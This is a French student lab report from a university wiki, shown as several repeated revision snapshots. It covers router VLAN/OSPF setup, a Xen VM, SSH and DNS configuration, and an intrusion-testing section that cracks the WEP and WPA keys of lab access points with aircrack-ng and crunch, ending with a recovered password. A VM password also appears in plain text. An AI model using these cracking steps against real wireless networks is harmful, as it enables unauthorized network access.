2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:AD:D9:5F:87:03 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid 44:AD:D9:5F:87:03 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56973TP sysres IMA5 2021/2022 G72021-12-13T15:03:43Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 44:AD:D9:5F:87:03 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid 44:AD:D9:5F:87:03 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : ??? On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid ??? -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b ??? dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56971TP sysres IMA5 2021/2022 G72021-12-13T15:01:14Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est ??? On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid ??? wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : ??? On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid ??? -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b ??? dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56967TP sysres IMA5 2021/2022 G72021-12-13T14:58:45Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start NOM_DE_L_INTERFACE 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est ??? On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid ??? wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : ??? On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid ??? -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b ??? dumpWPA.cap<br />
<br />
